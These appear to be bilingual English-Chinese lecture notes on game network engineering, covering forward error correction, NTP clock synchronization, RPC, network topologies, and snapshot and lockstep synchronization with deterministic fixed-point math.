    • When the receiver receives a damaged packet, it will send a NACK, and the sender will retransmit the frame for which the NACK was received

      当接收方收到损坏的数据包时,它会发送一个 NACK,发送方将重传收到 NACK 的帧

    webp

    Make UDP Reliable in Packet Loss Scenario

    在丢包情况下使 UDP 可靠

    As packet loss rate and delay increase, reliable UDP gradually fails to meet the transmission requirements. E.g. if the packet loss rate increases to 20%, reliable UDP still suffers high delay.

    随着丢包率和延迟的增加,可靠 UDP 逐渐无法满足传输要求。例如,如果丢包率增加到 20%,使用可靠 UDP 仍然会有高延迟。

    webp

    Forward Error Correction (FEC)

    前向纠错(FEC)

    • The transmission of enough additional, redundant information with the primary data stream to reconstruct lost IP packets up to a certain extent

      与主数据流一起传输足够的附加冗余信息,以在一定程度上重建丢失的 IP 数据包

    webp

    XOR-FEC

    | A | B | A XOR B |
    | --- | --- | --- |
    | 0 | 0 | 0 |
    | 0 | 1 | 1 |
    | 1 | 0 | 1 |
    | 1 | 1 | 0 |

    | Law 律 | Desc 描述 |
    | --- | --- |
    | Law of identity 同一律 | A xor 0 = A |
    | Zeroing law 零律 | A xor A = 0 |
    | Commutative law 交换律 | A xor B = B xor A |
    | Associative law 结合律 | A xor (B xor C) = (A xor B) xor C |

    C = A xor B

    A = A xor (B xor B) = (A xor B) xor B = C xor B

    B = (A xor A) xor B = A xor C

    • There are four packets A, B, C, D
      • Let E = XOR (A, B, C, D)
      • A = XOR (B, C, D, E)
      • B = XOR (A, C, D, E)
      • C = XOR (A, B, D, E)
      • D = XOR (A, B, C, E)

    webp

    If any packet is lost, it can be recovered with the other four packets.

    如果任何一个数据包丢失,可以用其他四个数据包恢复。

    Only one packet can be lost in continuous data. If $A$ and $B$ are lost at the same time, the algorithm cannot recover them.

    连续数据中只能丢失一个数据包。如果 $A$ 和 $B$ 同时丢失,则算法无法恢复。
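
    A minimal sketch of XOR parity over a group of fixed-size packets (the packet size is an illustrative assumption; real FEC schemes also handle variable sizes and interleaving):

    #include <array>
    #include <cstddef>
    #include <cstdint>

    constexpr size_t kPacketSize = 1024;
    using Packet = std::array<uint8_t, kPacketSize>;

    // E = XOR(A, B, C, D): computed by the sender and sent as redundancy.
    Packet xorParity(const Packet* packets, size_t count) {
        Packet parity{}; // zero-initialized
        for (size_t i = 0; i < count; i++)
            for (size_t b = 0; b < kPacketSize; b++)
                parity[b] ^= packets[i][b];
        return parity;
    }

    // If exactly one packet of the group is lost, XOR-ing the survivors with
    // the parity packet reconstructs it, e.g. A = XOR(B, C, D, E).
    Packet recoverLost(const Packet* survivors, size_t count, const Packet& parity) {
        Packet lost = parity;
        for (size_t i = 0; i < count; i++)
            for (size_t b = 0; b < kPacketSize; b++)
                lost[b] ^= survivors[i][b];
        return lost;
    }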

    Reed-Solomon Codes

    里德-所罗门码

    There are $N$ valid data, and $M$ FEC data are expected to be generated

    有 $N$ 个有效数据,预计将生成 $M$ 个 FEC 数据

    • Form the $N$ valid data into a vector $D$

      将 $N$ 个有效数据组成向量 $D$

    • Generate a transformation matrix $B$: it is composed of an $N$-order identity matrix and an $M \times N$ Vandermonde matrix (the matrix composed of any $N$ rows of matrix $B$ is invertible)

      生成一个变换矩阵 $B$:它由一个 $N$ 阶单位矩阵和一个 $M \times N$ 范德蒙矩阵组成(矩阵 $B$ 的任意 $N$ 行组成的矩阵都是可逆的)

    • The matrix $G$ obtained by multiplying the matrix $B$ and the vector $D$ contains the $M$ redundant FEC data

      将矩阵 $B$ 与向量 $D$ 相乘得到的矩阵 $G$ 包含 $M$ 个冗余的 FEC 数据

    webp

    Assume $D1$, $D4$, $C2$ are lost

    假设 $D1$、$D4$、$C2$ 丢失

    • The $B$ matrix also needs to delete the corresponding rows to obtain a deformed matrix $B'$

      $B$ 矩阵也需要删除相应的行,得到变形矩阵 $B'$

    webp

    • Invert matrix $B'$ to get $B'^{-1}$

      对矩阵 $B'$ 求逆,得到 $B'^{-1}$

    • Multiply both sides by $B'^{-1}$ to recover the original data

      两侧同乘 $B'^{-1}$ 以恢复原始数据

    webp

    Customize Your UDP based on ARQ and FEC

    基于 ARQ 和 FEC 自定义 UDP

    Reliability

    可靠性

    • Use Selective Repeat ARQ

      使用选择性重复 ARQ

    Hybrid ARQ and FEC

    混合 ARQ 和 FEC

    • Before ARQ, FEC is used for error correction

      在 ARQ 之前,FEC 用于纠错

    Real-time

    实时

    • Smaller RTO growth

      RTO 增长较小

    • No congestion control

      无拥堵控制

    • Fast retransmission mechanism

      快速重传机制

    • No delay ACK

      无延迟确认

    Flexibility

    灵活性

    • Design the protocol for speed

      为速度而设计协议

    • Support both reliable and unreliable transmission

      支持可靠和不可靠的传输

    Clock Synchronization

    时钟同步

    RTT

    Round-Trip Time

    往返时间

    • Send/Recv delay

      发送/接收延迟

    • Propagation delay

      传播延迟

    • Response time of the origin server

      源服务器的响应时间

    RTT vs. Ping

    • Ping tests are usually performed within a transport protocol that uses ICMP packets

      Ping 测试通常在使用 lCMP 数据包的传输协议中执行

    • RTT is measured at the application layer

      RTT 在应用层进行测量

    RTT vs. Latency

    • Latency is the time required for a data packet to travel from the sending endpoint to the receiving endpoint (only one trip)

      延迟是数据包从发送端点传输到接收端点所需的时间(仅单程)

    webp

    Network Time Protocol (NTP)

    网络时间协议(NTP)

    Network Time Protocol is an internet protocol used to synchronize with computer clock time sources in a network.

    网络时间协议是一种用于与网络中的计算机时钟时间源同步的互联网协议。

    • Reference clock

      参考时钟

      • GPS clock or radio transmitting station

        GPS 时钟或无线电发射站

      • Amazingly precise timekeeping devices such as atomic clocks

        令人惊叹的精确计时设备,如原子钟

      • Not connected to the internet

        未连接到互联网

      • Send their time through radio or optical fiber

        通过无线电或光纤发送他们的时间

    Time Server Stratums

    时间服务器层

    Stratum Values

    • Degrees of separation from the reference clock

      与参考时钟的分离程度

    • Reference clock has stratum value of 0

      参考时钟的层值为 0

    • Servers with stratum value 1 is called primary time servers

      层值为 1 的服务器称为主时间服务器

    • If a device’s stratum value is over 15, its time is not trustworthy

      如果设备的层值超过 15,则其时间不可信

    • Device will choose a server with a lower stratum value automatically when correcting time

      设备在校正时间时会自动选择层值较小的服务器

    webp

    NTP Algorithm

    NTP 算法

    Using NTP is quite simple, just like this

    使用 NTP 非常简单,就像这样

    • Client ask time server for time

      客户端向时间服务器请求时间

    • Server receives the request and reply

      服务器接收请求和回复

    • Client receives the reply

      客户端收到回复

    But we have to do something with the Delay!

    但我们必须对延迟做点什么!

    webp

    We record four timestamps: $t^c_0, t^s_1, t^s_2, t^c_3$

    webp

    $\mathrm{Round\ Trip\ Delay}=(t^c_3-t^c_0)-(t^s_2-t^s_1)$

    $\mathrm{Offset}=\frac{(t^s_1-t^c_0)+(t^s_2-t^c_3)}{2}$

    There is an implicit assumption that the one-way delay is statistically half the round-trip delay

    这里隐含的假设是:单向延迟在统计上是往返延迟的一半

    Local-clock correction is computed from the offset data by:

    根据偏移数据计算本地时钟校正。

    • $t^c_3 + \mathrm{Offset}$

    *The delay and clock-offset samples obtained can be filtered using maximum-likelihood techniques

    *获得的延迟和时钟偏移样本可以使用最大似然技术进行滤波

    Let’s take an example:

    让我们举一个例子:

    It’s 17:01:00 on the client and 17:01:30 on the server. The true (server) time of each event is given in parentheses:

    • $t^c_0$ is 17:01:00 (17:01:30)
    • $t^s_1$ is 17:01:32 (17:01:32)
    • $t^s_2$ is 17:01:33 (17:01:33)
    • $t^c_3$ is 17:01:05 (17:01:35)

    $\mathrm{Round\ Trip\ Delay}=(t^c_3-t^c_0)-(t^s_2-t^s_1)$

    $\mathrm{Offset}=\frac{(t^s_1-t^c_0)+(t^s_2-t^c_3)}{2}$


    Round Trip Delay = (05 - 00) - (33 - 32) = 4s

    Offset = (32 - 00 + 33 - 05) / 2 = 30s

    So at $t^c_3$ client’s time is corrected to:

    • $t^c_3 + \mathrm{Offset}= 17:01:35$
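    A minimal C++ sketch of this computation (function names are illustrative, not from any NTP library; times are in seconds):

    double roundTripDelay(double tc0, double ts1, double ts2, double tc3) {
        return (tc3 - tc0) - (ts2 - ts1);
    }

    double clockOffset(double tc0, double ts1, double ts2, double tc3) {
        return ((ts1 - tc0) + (ts2 - tc3)) / 2.0;
    }

    // The example above, in seconds past 17:01:00 on the client clock:
    // roundTripDelay(0, 32, 33, 5) == 4 and clockOffset(0, 32, 33, 5) == 30,
    // so the corrected client time is 17:01:05 + 30s = 17:01:35.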

    Stream-Based Time Synchronization with Elimination of Higher Order Modes

    基于流的时间同步,消除高阶模式

    1. Client stamps current local time on a “time request” packet and sends it to the server

    客户端在“时间请求”数据包上标记当前本地时间并发送到服务器

    2. Upon receipt by the server, the server stamps server-time and returns

    服务器收到后,标记服务器时间并返回

    3. Upon receipt by the client, a time delta is calculated by delta = (currentTime - sentTime) / 2

    客户端收到后,通过 delta =(当前时间 - 发送时间)/ 2 计算时间增量

    So far this algorithm is very similar to NTP

    到目前为止,该算法与 NTP 非常相似

    4. The first result should immediately be used to update the clock

    第一个结果应立即用于更新时钟

    5. The client repeats Steps 1-3 (the NTP-like process) five or more times

    客户端重复步骤 1-3(类似 NTP 的过程)五次或更多次

    6. The results of the packet receipts are accumulated and sorted in ascending order by latency

    数据包接收的结果按延迟升序累积和排序

    7. All samples above approximately 1.5 times the median are discarded, and the remaining samples are averaged using an arithmetic mean

    丢弃所有超过中位数约 1.5 倍的样本,并对剩余样本取算术平均值

    webp
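    A minimal C++ sketch of steps 6-7 (the Sample struct and the collection of five or more samples from steps 1-5 are assumed):

    #include <algorithm>
    #include <vector>

    struct Sample { double latency; double offset; };

    // Sort by latency, drop samples above ~1.5x the median latency,
    // and return the arithmetic mean of the remaining offsets.
    double filteredOffset(std::vector<Sample> samples) {
        std::sort(samples.begin(), samples.end(),
                  [](const Sample& a, const Sample& b) { return a.latency < b.latency; });
        double median = samples[samples.size() / 2].latency;
        double sum = 0.0;
        int n = 0;
        for (const Sample& s : samples) {
            if (s.latency <= 1.5 * median) { sum += s.offset; ++n; }
        }
        return sum / n;
    }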

    Remote Procedure Call (RPC)

    远程过程调用(RPC)

    Socket Programming: Still not Great

    Socket 编程:仍然不太好

    • Lots for the programmer to deal with every time

      程序员每次都要处理很多事情

      • How to separate different requests on the same connection?

        如何在同一连接上分离不同的请求?

      • How to write bytes to the network/read bytes from the network?

        如何向网络写入字节/从网络读取字节?

      • What if Host A’s process is written in Go and Host B’s process is in C++?

        如果主机 A 的进程是用 Go 编写的,而主机 B 的进程是 C++ 编写的呢?

      • What to do with those bytes?

        如何处理这些字节?

    • Still pretty painful… have to worry a lot about the network

      仍然很痛苦…不得不非常担心网络

      • Have you received the message?

        你收到消息了吗?

    Communication with Messages

    消息通信

    webp

    Communication Way

    沟通方式

    Initially, people “hand-coded” messages to send requests and responses

    最初,人们“手工编码”消息以发送请求和响应

    • Message is a stream of bytes: “op codes” and operands

      消息是字节流-“操作码”和操作数

    Lots of drawbacks

    很多缺点

    • Need to worry about message format

      需要担心消息格式

    • Have to pack and unpack data from messages

      必须从消息中打包和解包数据

    • Servers have to decode messages and dispatch them to handlers

      服务器必须解码消息并将其分派给处理程序

    • Messages are often asynchronous

      消息通常是异步的

      • After sending one, what do you do until the response comes back?

        发送一个后,在收到回复之前,你会做什么?

    • Messages aren’t a natural programming mode

      消息不是一种自然的编程模式

    #include <arpa/inet.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* A hand-coded message: a length header followed by the payload bytes. */
    struct foomsg {
        uint32_t len;
    };

    /* outsock is assumed to be an already-connected socket descriptor. */
    int outsock;

    void send_foo(char *contents) {
        int msglen = sizeof(struct foomsg) + strlen(contents);
        char *buf = malloc(msglen);
        struct foomsg *fm = (struct foomsg *)buf;
        fm->len = htonl(strlen(contents));  /* length in network byte order */
        memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
        write(outsock, buf, msglen);        /* send header + payload */
        free(buf);
    }

    More Challenges on Logic Communication

    逻辑通信面临更多挑战

    • For a remote procedure call, a remote machine may:

      对于远程过程调用,远程机器可以:

      • Run process written in a different language

        运行用其他语言编写的进程

      • Represent data types using different sizes

        使用不同大小表示数据类型

      • Use a different byte ordering (endianness)

        使用不同的字节顺序(字节序)

      • Represent floating point numbers differently

        以不同的方式表示浮点数

      • Have different data alignment requirements

        有不同的数据对齐要求

        e.g., 4-byte type begins only on 4-byte memory boundary

        例如,4 字节类型仅在 4 字节内存边界上开始

    Remote Procedure Call (RPC)

    远程过程调用(RPC)

    • RPC is a request-response protocol. An RPC is initiated by the client, which sends a request message to a known remote server to execute a specified procedure with supplied parameters

      RPC 是一种请求-响应协议。RPC 由客户端发起,它向已知的远程服务器发送一条请求消息,以使用提供的参数执行指定的过程

    • Goals

      目标

      • Ease of programming

        易于编程

      • Hide complexity

        隐藏复杂性

      • Familiar model for programmers (just make a function call)

        程序员熟悉的模型(只需进行函数调用)

    webp

    RPC example

    • Go language

    webp

    • Output

      Hello World

    Why RPC?

    为什么选择 RPC?

    • Goal: Easy-to-program network communication that makes client-server communication transparent

      目标:易于编程的网络通信,使客户端-服务器通信透明

      • Retains the “feel” of writing centralized code

        保留编写集中式代码的“感觉”

      • Programmers needn’t think about the network

        程序员不必考虑网络

      • Make communication appear like a local procedure call

        使通信看起来像本地过程调用

    • Don’t need to worry about serialization/deserialization for network

      无需担心网络的序列化/反序列化

    • Don’t need to worry about complexities of network

      无需担心网络的复杂性

    Interface Definition Language

    接口定义语言

    • A server defines the service interface using an interface definition language (IDL)

      服务器使用接口定义语言(IDL)定义服务接口

      The IDL specifies the names, parameters, and types for all client-callable server procedures

      IDL 指定了所有客户端可调用的服务器过程的名称、参数和类型

      • example: ASN.1 in the OSI reference model

        示例:OSI 参考模型中的 ASN.1

      • example: Protobuf (Google’s data interchange format)

        示例:Protobuf(谷歌的数据交换格式)

    // polyline.proto
    syntax = "proto2";

    message Point {
      required int32 x = 1;
      required int32 y = 2;
      optional string label = 3;
    }

    message Line {
      required Point start = 1;
      required Point end = 2;
      optional string label = 3;
    }

    message Polyline {
      repeated Point point = 1;
      optional string label = 2;
    }

    RPC Stubs

    • A client-side stub is a procedure that looks to the client as if it were a callable server procedure

      客户端存根是一个过程,它在客户端看起来就像是一个可调用的服务器过程

      • The client program thinks it’s invoking the server but it’s calling into the client-side stub

        客户端程序认为它正在调用服务器,但它正在调用客户端存根

    • A server-side stub looks like a caller to the server

      服务器端存根看起来像是服务器的调用者

      • The server program thinks it’s called by the client but it’s really called by the server-side stub

        服务器程序认为它是由客户端调用的,但实际上是由服务器端存根调用的

    • The stubs send messages to each other to make the RPC happen transparently

      存根相互发送消息,使 RPC 透明地发生

    webp

    Stub compiler

    • A “stub compiler” reads the IDL declarations and produces two stub procedures for each server procedure

      “存根编译器”读取 IDL 声明,并为每个服务器过程生成两个存根过程

      • The server programmer implements the service’s procedures and links them with the server-side stubs

        服务器程序员实现服务的过程,并将其与服务器端存根链接起来

      • The client programmer implements the client program and links it with the client-side stubs

        客户端程序员实现客户端程序并将其与客户端存根链接

      • The stubs manage all of the details of remote communication between client and server

        存根管理客户端和服务器之间远程通信的所有细节

    Real RPC Package Journey

    真实 RPC 包之旅

    webp

    Network Topology

    网络拓扑

    Original Peer-to-Peer (P2P)

    原始点对点(P2P)

    • Each client broadcasts game events to all the others

      每个客户端向所有其他客户端广播游戏事件

    • Robustness

      稳健性

    • Cheating is much easier

      作弊要容易得多

    • Synchronization is required among all nodes to maintain the consistency of the distributed game state

      所有节点之间需要同步,以保持分布式游戏状态的一致性

    webp

    P2P with Host Server

    P2P 与主机服务器(如 CS)

    • A player can act as “server”, known as host

      玩家可以充当“服务器”,即主机

    • If host disconnected, the game may end

      如果主机断开连接,游戏可能会结束

    • The host needs to handle game actors that cannot be controlled by players, such as bots

      主机需要处理玩家无法控制的游戏角色,如机器人

    webp

    P2P Games

    P2P 游戏

    • No reliance on a server

      不依赖服务器

    • Commonly used in LAN

      常用于局域网

    • The “Host” is basically in control of the sessions

      “主机”基本上控制着会话

    • A limited number of players at once

      一次玩家数量有限

    webp

    Dedicated Server

    专用服务器

    • Authority

      权威机构

    • Simulate game world

      模拟游戏世界

    • Dispatch data to players

      向玩家发送数据

    • High performance requirements

      高性能要求

    webp

    P2P vs Dedicated Server

    P2P 与专用服务器

    P2P Pros:
    1. Robustness 稳健性
    2. Removes the “server issues” problem in multiplayer sessions 消除多人游戏会话中的“服务器问题”
    3. No extra cost on server 服务器无需额外成本

    P2P Cons:
    1. Cheating is much easier 作弊要容易得多
    2. Every player needs a decent network connection for the game to function properly 每个玩家都需要一个像样的网络连接,游戏才能正常运行
    3. Can only handle a limited number of players 只能处理有限数量的玩家

    Dedicated Server Pros:
    1. Easy to maintain as well as avoiding cheating 易于维护,且能避免作弊
    2. Can handle a massive game world 可以处理大型游戏世界
    3. Responsiveness of the game does not rely on the network conditions of each individual client 游戏的响应性不取决于每个客户端的网络状况

    Dedicated Server Cons:
    1. High cost on server 服务器成本高
    2. Much more work on the server-side program 服务器端程序的工作量大得多
    3. Single point of failure 单点故障

    When RTT is too high

    RTT 过高时

    • When players are in different countries, far away, or when the network environment is complex

      当玩家身处不同的国家、遥远的地方,或者网络环境复杂时

    • Use dedicated line and edge gateway to reduce latency

      使用专用线路和边缘网关来减少延迟

    webp

    Game Synchronization

    游戏同步

    Single-Player Gaming

    Game Tick

    • Player inputs

      玩家输入

    • Convert to game commands

      转换为游戏命令

    • Game logic

      游戏逻辑

    • Game render

      游戏渲染

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency with each other

      相互之间的一致性

    webp

    Online Gaming

    在线游戏

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency with each other

      相互之间的一致性

    How to play together at different terminals?

    如何在不同的终端上一起玩?

    • Game commands

      游戏命令

    • Game Logic

      游戏逻辑

    webp

    Game Synchronization

    游戏同步

    To answer the demand for responsiveness, the synchronization rule is designed to solve the delay and consistency problems across all destinations.

    为了满足对响应性的需求,设计了同步规则来解决所有端的延迟和一致性问题。

    Synchronization Methods

    同步方法

    webp

    Snapshot 快照: Quake
    Lockstep 锁步: Honor of Kings 王者荣耀
    State Synchronization 状态同步: Counter-Strike 反恐精英

    Snapshot Synchronization

    快照同步

    webp

    • Client sends inputs to server

      客户端向服务器发送输入

    • Server simulates the game world

      服务器模拟游戏世界

    • Generates whole game state snapshots

      生成整个游戏状态快照

    • Sends them down to clients

      将它们下发给客户端

    • Client updates the display according to the snapshot

      客户端根据快照更新显示

    Snapshot Synchronization - Jitter and Hitches

    快照同步 - 抖动和卡顿

    • Server tick rate is limited

      服务器 tick 速率有限

    • Performance

      性能

    • Bandwidth

      带宽

    Snapshot Interpolation

    快照插值

    • Not rendering immediately after a snapshot is received

      收到快照后不立即渲染

    • Keep an interpolation buffer

      保留插值缓冲区

    • Interpolation between the two delayed snapshots

      两个延迟快照之间的插值
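    A minimal C++ sketch of such an interpolation buffer (Snapshot and the 100 ms offset are illustrative assumptions):

    #include <deque>

    struct Snapshot { double time; float x, y; };

    struct InterpolationBuffer {
        std::deque<Snapshot> buf;   // snapshots ordered by time
        double offset = 0.1;        // artificial delay, e.g. ~2 snapshot intervals

        // Render at (now - offset), interpolating between the two
        // snapshots that bracket the delayed render time.
        bool sample(double now, Snapshot& out) const {
            double t = now - offset;
            for (size_t i = 0; i + 1 < buf.size(); ++i) {
                const Snapshot& a = buf[i];
                const Snapshot& b = buf[i + 1];
                if (a.time <= t && t <= b.time) {
                    float k = float((t - a.time) / (b.time - a.time));
                    out = { t, a.x + k * (b.x - a.x), a.y + k * (b.y - a.y) };
                    return true;
                }
            }
            return false;  // not enough snapshots buffered yet
        }
    };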

    Delta Compression

    增量压缩

    • Only sync snapshot delta to client

      仅将快照增量同步到客户端

    • Example: Quake 3

    webp

    Snapshot Synchronization

    快照同步

    • 60 Hz

    • Max bandwidth 4.5 Mbps

      最大带宽 4.5 Mbps

    Delta Compression

    增量压缩

    • 60 Hz

    • Max bandwidth 676 kbps

      最大带宽 676 kbps

    Synchronizing Snapshot

    同步快照

    • Client performance is wasted

      客户端性能被浪费

    • High server pressure

      服务器压力高

    • High data volume and high bandwidth requirements

      高数据量和高带宽要求

    • As games get more complex, snapshots get bigger

      随着游戏变得越来越复杂,快照也越来越大

    Lockstep Synchronization

    锁步同步

    Lockstep Origin

    锁步的起源

    Lockstep synchronization, used in military simulation, is by far the simplest technique to ensure consistency

    用于军事模拟的锁步同步是迄今为止确保一致性的最简单技术。

    • Same Result

      相同的结果

    • Same time

      同一时间

    • Same action

      同样的行动

    No member is allowed to advance its simulation clock until all other members have acknowledged that they are done.

    在所有其他成员确认完成之前,任何成员都不允许提前其模拟时钟。

    webp

    In particular, it is clear that a totally ordered delivery is a sufficient condition to ensure game state consistency across different nodes, as it guarantees that all generated events are reliably delivered according to the same unique order.

    特别是,很明显,完全有序的交付是确保不同节点之间游戏状态一致性的充分条件,因为它保证了所有生成的事件都按照相同的唯一顺序可靠地交付。

    Lockstep in Online Game

    网络游戏中的锁步

    Lockstep Principle.

    锁步原理。

    webp

    First Game Used Lockstep

    第一个游戏使用锁步

    • The network synchronization method of DOOM (1994) was pointed out in a 2006 paper

      2006 年的一篇论文指出了 DOOM(1994)的网络同步方法

    • Lockstep is not mentioned in the paper, but it is now generally accepted that Doom (1994) was the first multiplayer FPS online game to use this type of synchronization

      论文中没有提到锁步,但现在人们普遍认为《毁灭战士》(1994)是第一款使用这种同步的多人 FPS 在线游戏

    • It uses P2P architecture

      它使用 P2P 架构

    webp

    Lockstep initialization

    锁步初始化

    Loading…

    加载…

    • Ensure that the initial data of each client is deterministic

      确保每个客户端的初始数据是确定的

      • Game model

        游戏模型

      • Static data

        静态数据

    • Synchronize clock

      同步时钟

    Deterministic Lockstep

    确定性锁步

    • Client sends inputs to Server

      客户端向服务器发送输入

    • Server receives and sorts

      服务器接收和排序

    • Wait for input from all clients before forwarding

      转发前等待所有客户端的输入

    • After receiving data from the server, the client executes the game logic

      在从服务器接收到数据后,客户端执行游戏逻辑

    webp

    What if Player B’s message B2 arrives later? (The dotted line B2 in the figure)

    如果玩家 B 的消息 B2 稍后到达?(图中虚线 B2)

    • Disadvantages

      缺点

      • Game progress depends on slowest player

        游戏进度取决于最慢的玩家

      • The delay of the game is not fixed, and the experience is not good

        游戏的延迟不固定,体验不好

      • All the players will wait if a player offline

        如果有玩家离线,所有玩家都会等待

    webp

    Player Offline in Deterministic Lockstep

    确定性锁步中的玩家离线

    Waiting for players…

    正在等待玩家…

    webp

    Bucket Synchronization

    Bucket 同步

    • Bucket: a fixed time period

      Bucket:固定时间段

    • Each bucket

      每个 bucket

      • Collect all instructions

        收集所有指令

      • Broadcast to all players

        向所有玩家广播

    • There is no need to wait for all players’ commands to be received before forwarding

      转发前无需等待收到所有玩家的命令
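    A minimal sketch of the server side in C++ (all names are illustrative; a fixed timer is assumed to call closeBucket once per bucket):

    #include <utility>
    #include <vector>

    struct Command { int playerId; int input; };

    // One bucket = the commands collected during one fixed time slice.
    struct Bucket { int frameId; std::vector<Command> commands; };

    // Unlike strict deterministic lockstep, the server does not wait for
    // every player: whatever has arrived is broadcast, and late commands
    // simply fall into the next bucket.
    Bucket closeBucket(int frameId, std::vector<Command>& pending) {
        Bucket b{ frameId, std::move(pending) };
        pending.clear();
        // broadcast(b);  // send to all players (network layer omitted)
        return b;
    }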

    webp

    A Good Trade-off between Consistency and Interactivity Maintenance

    一致性和交互性维护之间的良好权衡

    So we need to find a proper balance between them.

    因此,我们需要在它们之间找到一个恰当的平衡点。

    The threshold:

    阈值:

    As soon as the measured interactivity degree decreases below a given threshold, a procedure skips processing obsolete game events with the aim of bringing back a satisfactory interactivity level.

    一旦测量的交互性降低到给定的阈值以下,一些程序就会跳过处理过时的游戏事件,以恢复令人满意的交互性水平。

    webp

    Deterministic Difficulties

    确定性难题

    • Deterministic

      确定性

      • The same input sequence need to produce the same game state on all machines

        相同的输入序列需要在所有机器上产生相同的游戏状态

    • Deterministic is Hard

      确定性很难

      • Floating point

        浮点型

      • Random number

        随机数

      • Containers and algorithms (sort, add, remove, etc.)

        容器和算法(排序、添加、删除等)

      • Math tools (vectors, quaternions, etc)

        数学工具(向量、四元数等)

      • Physics simulation (very difficult)

        物理模拟(非常困难)

      • Code logic execution order

        代码逻辑执行顺序

    webp

    Floating Point Numbers

    浮点数

    • Because computers are binary, these numbers can be accurately represented

      由于计算机采用二进制,这些数字可以被精确地表示

      • 0.5 = 1/2
      • 0.25 = 1/4
      • 0.75 = 1/2 + 1/4
      • 0.875 = 1/2 + 1/4 + 1/8
    • Such numbers can only be approximated

      这些数字只能近似表示

      • 2/3 ≈ 0.66…7

    webp

    • Floating point numbers must comply with the IEEE 754 standard

      浮点数必须符合 IEEE 754 标准


    • Floating point numbers conform to the IEEE 754 standard

      浮点数符合 IEEE 754 标准

    • But different platforms may have different behavior

      但不同的平台可能有不同的行为


    Floating Point Hardware & OS Behaviour

    浮点硬件和操作系统行为

    • Intel / AMD

    • PS / Xbox

    • Windows / Linux

    • Android / iOS


    Floating Point Compilers Behaviour

    浮点编译器行为

    • Math library (sin, cos, tan, exp, pow, …)

      数学库(sin、cos、tan、exp、pow 等)

    • Third party components

      第三方组件

    • Different platforms

      不同的平台

    • Different versions

      不同版本

    • Different languages

      不同的语言


    Idea: Avoid problems on the precision boundary, customize the precision

    理念:避免精度边界问题,定制精度

    • Fixed-point math library

      定点数学库

    • Look-up table (trigonometric functions, etc.)

      查找表(三角函数等)

    • Amplification and truncation

      放大和截断

    Simple method

    简单的方法

    • Multiply by 1000, then divide by 1000; there is an overflow risk

      乘以 1000,然后除以 1000,存在溢出风险

    • The numerator and denominator are represented by fixed-point numbers (2/3)

      分子和分母由定点数(2/3)表示


    One Solution: Fixed point math

    一种解决方案:定点数

    A fixed-point number can be split into three parts

    一个定点数可以分成三部分

    • An optional sign bit

      可选符号位

    • An integer

      一个整数

    • A fractional part

      小数部分

    • Need to implement addition, subtraction, multiplication, division, etc.

      需要实现加、减、乘、除等运算

    • Implement class, class methods

      实现类、类方法

    • Performance needs to be considered

      需要考虑性能

    webp

    $$V=(-1)^{b_{f+i}}\left(\sum_{n=0}^{i}2^{n}b_{n+f}+\sum_{m=1}^{f}2^{-m}b_{f-m}\right)$$
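    A minimal Q16.16 fixed-point sketch in C++ (sign via two's complement, 16 fractional bits; a real library adds overflow handling, comparisons, and deterministic math functions):

    #include <cstdint>

    struct Fixed {
        int32_t raw;  // stores value * 2^16

        static Fixed fromInt(int v) { return { v << 16 }; }
        float toFloat() const { return raw / 65536.0f; }  // for display only

        Fixed operator+(Fixed o) const { return { raw + o.raw }; }
        Fixed operator-(Fixed o) const { return { raw - o.raw }; }
        Fixed operator*(Fixed o) const {
            // widen to 64 bits so the intermediate product cannot overflow
            return { int32_t((int64_t(raw) * o.raw) >> 16) };
        }
        Fixed operator/(Fixed o) const {
            return { int32_t((int64_t(raw) << 16) / o.raw) };
        }
    };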

    Random Number

    随机数

    • Random problems in the game

      游戏中的随机问题

      • Trigger of random events, NPC random birthplace

        随机事件触发,NPC 随机出生地

      • A random attribute of the attack, e.g. critical strike chance

        攻击的随机属性,例如暴击机会

    • These logics are generally implemented with random numbers

      这些逻辑通常用随机数实现

    • How to implement random logic that is completely consistent for multiple players

      如何为多个玩家实现完全一致的随机逻辑

    webp

    • Random numbers are pseudorandom

      随机数是伪随机的

    • Before the game starts, initialize the random number seed

      在游戏开始之前,初始化随机数种子

    • For different players’ clients, the number of random function calls is fixed, and the generated random numbers are the same

      对于不同玩家的客户端,随机函数调用的数量是固定的,生成的随机数是相同的

    webp

    #include <iostream>
    #include <random>

    int main() {
        std::default_random_engine e;
        std::uniform_int_distribution<int> u(0, 100);
        e.seed(80);  // same seed on every client gives the same sequence

        for (int i = 0; i < 20; i++) {
            std::cout << u(e) << std::endl;
        }

        return 0;
    }

    Deterministic Solution

    确定性解决方案

    • Fixed-point numbers represent floating-point numbers in critical game logic

      定点数表示关键游戏逻辑中的浮点数

    • Deterministic random algorithm

      确定性随机算法

    • Deterministic containers and algorithms (sort, add, remove, etc.)

      确定性容器和算法(排序、添加、删除等)

    • Deterministic math tools (vectors, quaternions, etc.)

      确定性数学工具(向量、四元数等)

    • Deterministic physics simulation (very difficult)

      确定性物理模拟(非常困难)

    • Deterministic execution order

      确定性执行顺序

    webp

    Tracing and Debugging

    跟踪和调试

    Methods of getting a checksum

    获取校验和的方法

    • All data checksum

      所有数据校验和

    • Key data checksum

      关键数据校验和

    • Other methods

      其他方法

    Automatically locate BUG

    自动定位 BUG

    • Server compares different clients’ checksums

      服务器比较不同客户端的校验和

    • Client uploads 50 frames of full logs

      客户端上传 50 帧完整日志

    • Find inconsistencies in the compared logs

      查找比较日志中的不一致之处

    webp

    Lag and Delay

    卡顿与延迟

    • Client send operation

      客户端发送操作

    • Receive the operation of this frame from the server

      从服务器接收此帧的操作

    • execute

      执行

    Lag: The network is unstable. If you wait until you receive a new frame, there will be a lag

    卡顿:网络不稳定。如果等到收到新帧才执行,就会产生卡顿

    Solution

    解决方案

    • Use a buffer to cache frames

      使用缓冲区缓存帧

      • Large buffer, large delay

        缓冲区大,延迟大

      • Small buffer, sensitive to lag

        小缓冲区,对延迟敏感

    webp

    Separating Game Logic from Rendering

    将游戏逻辑与渲染分离

    Lag problem

    滞后问题

    • Separation of logic and rendering

      逻辑与渲染的分离

    • Local client-side interpolation smoothing

      本地客户端插值平滑

    Frame rate

    帧率

    • The logical frame rate is generally 10~30 frames

      逻辑帧率一般为 10~30 帧

    • The rendering frame rate is generally higher

      渲染帧率通常较高

    webp

    Advantage

    优势

    • Different frequencies, independent operation

      不同频率,独立运行

    • Rendering separation to avoid tearing and freezing

      渲染分离以避免撕裂和冻结

